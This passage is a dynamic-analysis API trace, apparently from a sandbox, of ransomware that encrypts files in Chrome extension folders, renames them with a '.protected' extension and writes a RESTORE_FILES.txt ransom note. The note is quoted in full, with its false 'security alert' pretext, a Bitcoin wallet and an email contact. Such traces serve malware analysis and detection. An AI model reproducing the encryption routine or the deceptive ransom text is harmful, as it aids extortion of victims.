(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.993] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.993] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.993] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.994] CloseHandle (hObject=0x164) returned 1 [0078.994] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.994] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0078.994] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0078.994] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0078.994] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0078.994] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0078.994] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi") returned 141 [0078.994] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0078.994] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0078.994] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\*") returned 143 [0078.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.994] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.994] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.994] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.994] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.994] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.994] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\.") returned 143 [0078.994] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.994] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.994] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.994] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.994] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.994] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.994] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.994] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\..") returned 144 [0078.994] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.994] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.994] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.994] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.994] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.994] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.995] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.995] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.995] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.995] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.995] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.995] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.995] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.995] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.996] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.996] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.996] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.996] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.996] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json") returned 155 [0078.996] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.996] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x117, lpOverlapped=0x0) returned 1 [0078.997] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.997] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x117, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x117, lpOverlapped=0x0) returned 1 [0078.997] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.997] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.997] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.997] CloseHandle (hObject=0x168) returned 1 [0078.997] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.protected") returned 165 [0078.997] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\messages.json.protected")) returned 1 [0078.998] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.998] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.998] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\RESTORE_FILES.txt") returned 159 [0078.998] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.998] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.998] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.999] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.999] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.999] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.999] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.999] CloseHandle (hObject=0x164) returned 1 [0078.999] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.999] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0078.999] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0078.999] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0078.999] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0078.999] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0078.999] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu") returned 141 [0078.999] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0078.999] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0078.999] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\*") returned 143 [0078.999] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.000] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.000] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.000] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.000] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.000] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.000] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\.") returned 143 [0079.000] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.000] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.000] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.000] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.000] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.000] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.000] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.000] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\..") returned 144 [0079.000] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.000] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.000] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.000] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.000] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.000] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.000] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.000] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.000] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0079.000] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.000] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.000] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.000] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0079.001] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0079.001] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.001] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json") returned 155 [0079.001] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.001] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0079.001] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff15, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.001] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xeb, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xeb, lpOverlapped=0x0) returned 1 [0079.002] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.002] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.002] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.002] CloseHandle (hObject=0x168) returned 1 [0079.002] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.protected") returned 165 [0079.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\messages.json.protected")) returned 1 [0079.002] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.002] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.002] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\RESTORE_FILES.txt") returned 159 [0079.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.003] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.003] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.003] lstrlenA 